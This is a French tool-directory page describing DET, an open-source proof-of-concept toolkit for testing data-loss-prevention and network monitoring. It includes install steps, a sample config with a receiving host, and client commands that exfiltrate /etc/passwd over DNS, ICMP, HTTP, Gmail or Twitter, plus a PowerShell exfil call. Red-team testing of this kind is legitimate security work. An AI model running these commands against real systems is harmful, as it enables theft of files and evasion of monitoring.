Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
DET — (extensible) Data Exfiltration Toolkit (DET) | Kitploit
Outils/GitHubGitHub/sensepost/det
Outils de Chiffrement/DéchiffrementExfiltration de DonnéesSécurité RéseauTests d'IntrusionRed TeamingAnalyse DNS
GitHubsensepost/det

DET

(extensible) Data Exfiltration Toolkit (DET)

Voir le dépôt
821190il y a 8 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

DET (extensible) Boîte à outils d'exfiltration de données

=======

DET (est fourni EN L'ÉTAT), est une preuve de concept pour réaliser une exfiltration de données en utilisant un ou plusieurs canaux simultanément.

Ceci est une preuve de concept visant à identifier d'éventuelles défaillances de la DLP. Cela ne doit jamais être utilisé pour exfiltrer des données sensibles/réelles (par exemple lors d'une évaluation)

L'idée était de créer une boîte à outils générique pour brancher tout type de protocole/service afin de tester la configuration des solutions de surveillance réseau et de prévention des fuites de données (DLP) mises en œuvre, contre différentes techniques d'exfiltration de données.

Le dépôt principal a maintenant été déplacé ici.

Diapositives

DET a été présenté à BSides Ljubljana le 9 mars 2016 et les diapositives seront disponibles ici. Les diapositives sont disponibles ici.

Exemple d'utilisation (plugin ICMP)

Côté serveur :

asciicast

Côté client :

asciicast

Utilisation en combinant deux canaux (Gmail/Twitter)

Côté serveur :

asciicast

Côté client :

asciicast

Installation

Clonez le dépôt :

root@kitploit:~
git clone https://github.com/sensepost/DET.git

Ensuite :

root@kitploit:~
pip install -r requirements.txt --user

Configuration

Pour utiliser DET, vous devrez le configurer et ajouter vos propres paramètres (par exemple SMTP/IMAP, phrase de passe de chiffrement AES256, etc.). Un fichier d'exemple de configuration a été fourni et s'appelle : config-sample.json

root@kitploit:~
{
    "plugins": {
        "http": {
            "target": "192.168.1.101",
            "port": 8080
        },
        "google_docs": {
            "target": "192.168.1.101",
            "port": 8080,
        },
        "dns": {
            "key": "google.com",
            "target": "192.168.1.101",
            "port": 53
        },
        "gmail": {
            "username": "[email protected]",
            "password": "ReallyStrongPassword",
            "server": "smtp.gmail.com",
            "port": 587
        },
        "tcp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "udp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "twitter": {
            "username": "PaulWebSec",
            "CONSUMER_TOKEN": "XXXXXXXXX",
            "CONSUMER_SECRET": "XXXXXXXXX",
            "ACCESS_TOKEN": "XXXXXXXXX",
            "ACCESS_TOKEN_SECRET": "XXXXXXXXX"
        },
        "icmp": {
            "target": "192.168.1.101"
        }
    },
    "AES_KEY": "THISISACRAZYKEY",
    "sleep_time": 10
}

Utilisation

Aide d'utilisation

root@kitploit:~
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode

Côté serveur :

Pour charger tous les plugins :

root@kitploit:~
python det.py -L -c ./config.json

Pour charger uniquement les modules twitter et gmail :

root@kitploit:~
python det.py -L -c ./config.json -p twitter,gmail

Pour charger tous les plugins et exclure DNS :

root@kitploit:~
python det.py -L -c ./config.json -e dns

Côté client :

Pour charger tous les plugins :

root@kitploit:~
python det.py -c ./config.json -f /etc/passwd

Pour charger uniquement les modules twitter et gmail :

root@kitploit:~
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd

Pour charger tous les plugins et exclure DNS :

root@kitploit:~
python det.py -c ./config.json -e dns -f /etc/passwd

Et dans PowerShell (module HTTP) :

root@kitploit:~
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'

Modules

Jusqu'à présent, DET prend en charge plusieurs protocoles, listés ici :

  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (par ex. Gmail)
  • Raw TCP
  • Implémentation PowerShell (HTTP, DNS, ICMP, SMTP (utilisé avec Gmail))

Et d'autres 'services' :

  • Google Docs (non authentifié)
  • Twitter (messages directs)

Modules expérimentaux

Jusqu'à présent, je suis en train d'implémenter de nouveaux modules qui sont presque prêts à être livrés, notamment :

  • Skype (95% terminé)
  • Tor (80% terminé)
  • Github (30/40% terminé)

Feuille de route

  • Ajout d'un chiffrement approprié (par ex. AES-256) Merci à ryanohoro
  • Compression (extrêmement important !) Merci à chokepoint
  • Obfuscation appropriée des données et intégration de Cloakify Toolset
  • Modules FTP, Flickr, stéganographie LSB et Youtube

Références

Quelques références/crédits sympas aux personnes dont je me suis inspiré avec leur projet :

  • https://github.com/nullbind/Powershellery/ par Nullbind.
  • https://github.com/ytisf/PyExfil, vraiment génial.
  • https://github.com/m57/dnsteal par m57.
  • https://github.com/3nc0d3r/NaishoDeNusumu par 3nc0d3r.
  • https://github.com/glennzw/exphil par Glenn Wilkinson.
  • WebExfile par Saif El-Sherei

Contact/Contribution

Vous pouvez me joindre sur Twitter @PaulWebSec. N'hésitez pas si vous souhaitez contribuer, cloner, forker, soumettre votre PR, etc.

Licence

DET est sous licence MIT. Des autorisations au-delà du cadre de cette licence peuvent être disponibles à [email protected]

Télécharger l’outil